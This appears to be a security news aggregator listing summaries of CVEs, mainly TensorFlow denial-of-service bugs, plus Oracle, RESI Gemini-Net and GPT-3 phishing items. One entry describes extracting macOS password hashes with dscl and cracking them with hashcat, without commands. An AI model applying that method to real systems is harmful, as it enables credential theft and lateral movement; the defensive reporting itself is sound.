All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
CVE-2022-29203 is a vulnerability in TensorFlow (an open source platform for machine learning) where a function called `tf.raw_ops.SpaceToBatchND` has an integer overflow bug (a situation where a calculation produces a number too large for the system to handle). This overflow causes a denial of service (making the system crash or become unavailable) when the buggy code tries to allocate memory for output data.
Fix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4, which contain patches for this issue.
NVD/CVE DatabaseA vulnerability in TensorFlow (an open source platform for machine learning) versions prior to 2.9.0, 2.8.1, 2.7.2, and 2.6.4 allows attackers to cause a denial of service (making a system unavailable by consuming all available memory) by exploiting the `tf.ragged.constant` function, which does not properly check its input arguments. The vulnerability exists because of improper input validation (checking that data meets expected requirements before using it).
TensorFlow, an open source machine learning platform, had a vulnerability in its `tf.raw_ops.QuantizedConv2D` function (a tool for processing images with reduced precision) before versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 where it did not properly check input arguments, causing references to point to nullptr (an invalid memory location). This flaw was fixed in the mentioned versions.
TensorFlow (an open source platform for machine learning) has a vulnerability in versions before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 where certain operations fail when given an invalid resource handle (a reference to data or tools the program needs). In eager mode (where TensorFlow executes code immediately rather than preparing a plan first), this can cause a reference to point to a null pointer (a memory location that doesn't exist), leading to undefined behavior and potential crashes or errors. Graph mode had safeguards that prevented this issue.
TensorFlow (an open-source machine learning platform) has a bug in the `tf.raw_ops.LSTMBlockCell` function where it doesn't properly check that input arguments have the correct structure. An attacker can exploit this to cause a denial of service attack (crashing the program), because the code fails when trying to access elements inside incorrectly-shaped inputs.
TensorFlow (an open source machine learning platform) had a bug in the `tf.raw_ops.LoadAndRemapMatrix` function that didn't properly check its input arguments, specifically whether the `initializing_values` parameter was valid. This missing validation could cause the program to crash (denial of service, a type of attack that makes a service unavailable), even though the attacker doesn't gain control of the system.
TensorFlow, an open source machine learning platform, has a vulnerability in a function called `tf.raw_ops.SparseTensorToCSRSparseMatrix` that doesn't properly check its inputs before processing them. This missing validation allows attackers to cause a denial of service attack (making the system crash or become unavailable) by sending specially crafted data that violates the expected format for sparse tensors (data structures that store mostly empty values efficiently).
A bug in TensorFlow (an open source machine learning platform) versions before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 fails to validate input arguments to the `tf.raw_ops.UnsortedSegmentJoin` function, allowing attackers to trigger a denial of service attack (making the system crash or become unavailable). The vulnerability stems from the code assuming `num_segments` is a scalar (a single value) without checking this assumption first.
TensorFlow, an open source machine learning platform, has a vulnerability in its `tf.raw_ops.Conv3DBackpropFilterV2` function (a tool for training neural networks) that fails to properly check its input arguments before processing them. This missing validation allows attackers to crash the program with a denial of service attack (making it unavailable to legitimate users).
TensorFlow (an open source platform for machine learning) versions before 2.9.0, 2.8.1, 2.7.2, and 2.6.4 have a bug in the `tf.raw_ops.StagePeek` function that fails to check whether the `index` input is a scalar (a single number), allowing attackers to crash the system. This is a denial of service attack (making a service unavailable by overwhelming or breaking it).
TensorFlow, an open source platform for machine learning, had a vulnerability in the `tf.raw_ops.TensorSummaryV2` function that failed to properly validate (check the correctness of) input arguments before using them. This flaw could be exploited to cause a denial of service attack (making the system crash or become unavailable) by triggering a CHECK-failure (a forced program halt when an expected condition is not met).
TensorFlow, an open source machine learning platform, had a vulnerability in its `tf.raw_ops.DeleteSessionTensor` function (a specific operation within TensorFlow) that failed to properly check its input arguments before using them. This flaw could be exploited to cause a denial of service attack (making a system crash or become unavailable by sending specially crafted requests).
TensorFlow, an open source machine learning platform, had a vulnerability in the `tf.raw_ops.QuantizeAndDequantizeV4Grad` function where it did not fully validate input arguments before processing them. This bug could crash the system (a denial of service attack, where an attacker makes a service unavailable) in versions before 2.9.0, 2.8.1, 2.7.2, and 2.6.4.
TensorFlow, an open source machine learning platform, had a vulnerability in its `tf.raw_ops.GetSessionTensor` function (a command for retrieving tensor data from a session) where it did not properly validate input arguments, allowing attackers to crash the system through a denial of service attack (making software unavailable by overwhelming or breaking it). The vulnerability was fixed in TensorFlow versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4.
CVE-2022-29539 is a vulnerability in RESI Gemini-Net 4.2 where the resi-calltrace component fails to validate user input before processing it on the server, allowing attackers to perform OS command injection (injecting arbitrary system commands by exploiting improper input checking). An unauthenticated attacker can bypass the intended syntax rules and execute commands with the same privileges as the application.
CVE-2022-29538 is a vulnerability in RESI Gemini-Net Web 4.2 where improper access control in the authorization logic (the system that checks who is allowed to do what) allows unauthenticated users (people without valid login credentials) to access critical resources they shouldn't be able to reach. The vulnerability's severity rating has not yet been officially assessed.
A vulnerability in Oracle Java SE and Oracle GraalVM Enterprise Edition (a high-performance Java runtime) in the JAXP component (Java API for XML Processing, which handles XML data) allows an unauthenticated attacker to partially disable these systems over a network. The vulnerability affects specific versions of Java and can be exploited through untrusted code in web applications or through web services that supply data to the vulnerable APIs, with a severity rating of 5.3 out of 10.
Oracle Coherence (a data management tool in Oracle Fusion Middleware) has a critical vulnerability (CVE-2022-21420) that allows attackers without authentication to take over the system by exploiting the T3 protocol (a communication method used by Oracle products), affecting versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0. The vulnerability has a CVSS score (a 0-10 severity rating) of 9.8, meaning it is extremely serious and impacts confidentiality, integrity, and availability of the system.
On macOS, attackers can extract password hashes from the local directory service (the system that stores account information) using the dscl command tool, even when System Integrity Protection is enabled, then convert these hashes to a format that hashcat (a password-cracking tool) can process to crack the passwords. This technique is particularly dangerous when organizations reuse the same admin password across multiple Mac computers, making lateral movement (spreading access across a network) easier for attackers.
Fix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later. The source states: 'Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, as these versions contain a patch for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to versions 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, which contain a patch for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, which contain a patch for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, which contain patches for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, as these versions contain a patch for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, as these versions contain a patch for this issue.
NVD/CVE DatabaseFix: Update to TensorFlow versions 2.9.0, 2.8.1, 2.7.2, or 2.6.4, which contain patches that fix this input validation issue.
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later, as these versions contain a patch for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4 or later. The source states: 'Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'
NVD/CVE DatabaseFix: Update TensorFlow to version 2.9.0, 2.8.1, 2.7.2, or 2.6.4, which contain patches for this issue.
NVD/CVE DatabaseFix: Update TensorFlow to one of the patched versions: 2.9.0, 2.8.1, 2.7.2, or 2.6.4. A patch is available at https://github.com/tensorflow/tensorflow/commit/098e7762d909bac47ce1dbabe6dfd06294cb9d58.
NVD/CVE DatabaseFix: Update TensorFlow to one of the patched versions: 2.9.0, 2.8.1, 2.7.2, or 2.6.4.
NVD/CVE DatabaseGPT-3 (a large language model that generates realistic human-like text) could be misused by attackers to create convincing phishing attacks (fraudulent messages designed to trick people into revealing sensitive information). The post discusses this threat and mentions that organizations can take countermeasures to protect themselves, though specific details are not provided in the excerpt.